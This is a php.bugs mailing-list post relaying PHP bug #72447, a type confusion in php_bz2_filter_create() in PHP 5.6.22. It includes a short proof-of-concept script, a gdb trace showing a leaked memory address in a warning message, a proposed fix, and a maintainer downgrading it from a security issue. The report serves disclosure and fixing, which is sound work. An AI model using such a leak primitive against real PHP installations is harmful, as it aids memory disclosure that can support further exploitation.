Sec Bug->Bug #72447 [Opn]: Type Confusion in php_bz2_filter_create()

From: Date: Sun, 19 Jun 2016 05:05:25 +0000
Subject: Sec Bug->Bug #72447 [Opn]: Type Confusion in php_bz2_filter_create()
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-201728@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=72447&edit=1 ID: 72447 Updated by: stas@php.net Reported by: gogil at stealien dot com Summary: Type Confusion in php_bz2_filter_create() Status: Open -Type: Security +Type: Bug Package: Bzip2 Related Operating System: * PHP Version: 5.6.22 -Assigned To: +Assigned To: sterling Block user comment: N Private report: Y New Comment: Doesn't look like security issue, since it requires special code to reproduce. Previous Comments: ------------------------------------------------------------------------ [2016-06-18 17:37:45] gogil at stealien dot com * Fix - php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmpzval)); + php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL(tmp)); Little mistake. ------------------------------------------------------------------------ [2016-06-18 17:16:49] gogil at stealien dot com Description: ------------ Type Confusion vulnerability in php_bz2_filter_create() which leaking information. /php$ gdb --args php-5.6.22/sapi/cli/php poc.php Reading symbols from php-5.6.22/sapi/cli/php...done. (gdb) b bz2_filter.c:391 Breakpoint 1 at 0x5d49e1: file /php/php-5.6.22/ext/bz2/bz2_filter.c, line 391. (gdb) r Starting program: /php/php-5.6.22/sapi/cli/php poc.php Breakpoint 1, php_bz2_filter_create ( filtername=0x7ffff7eae8c0 "bzip2.compress", filterparams=0x7ffff7fc11c0, persistent=0) at /php/php-5.6.22/ext/bz2/bz2_filter.c:391 391 if (zend_hash_find(HASH_OF(filterparams), "blocks", sizeof("blocks"), (void**) &tmpzval) == SUCCESS) { (gdb) n 395 tmp = **tmpzval; (gdb) n 396 zval_copy_ctor(&tmp); (gdb) n 397 convert_to_long(&tmp); (gdb) n 398 if (Z_LVAL(tmp) < 1 || Z_LVAL(tmp) > 9) { (gdb) n 399 php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmpzval)); <---------- Z_LVAL_PP macro is able to leaking memory address. (gdb) n Warning: stream_filter_append(): Invalid parameter given for number of blocks to allocate. (140737352754896) in /php/poc.php on line 6 (gdb) x/x 140737352754896 0x7ffff7eae6d0: 0x41414141 * Fix File ext/bz2/bz2_filter.c, line 391: if (zend_hash_find(HASH_OF(filterparams), "blocks", sizeof("blocks"), (void**) &tmpzval) == SUCCESS) { /* How much memory to allocate (1 - 9) x 100kb */ zval tmp; tmp = **tmpzval; zval_copy_ctor(&tmp); convert_to_long(&tmp); if (Z_LVAL(tmp) < 1 || Z_LVAL(tmp) > 9) { - php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmpzval)); + php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmp)); } else { blockSize100k = Z_LVAL(tmp); } } Test script: --------------- <?php // poc.php $input = "AAAAAAAA"; $param = array('blocks' => $input); $fp = fopen('testfile', 'w'); stream_filter_append($fp, 'bzip2.compress', STREAM_FILTER_WRITE, $param); fclose($fp); ?> Expected result: ---------------- Warning: stream_filter_append(): Invalid parameter given for number of blocks to allocate. (0) Actual result: -------------- Warning: stream_filter_append(): Invalid parameter given for number of blocks to allocate. (140737352754896) ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=72447&edit=1

« previous php.bugs (#201728) next »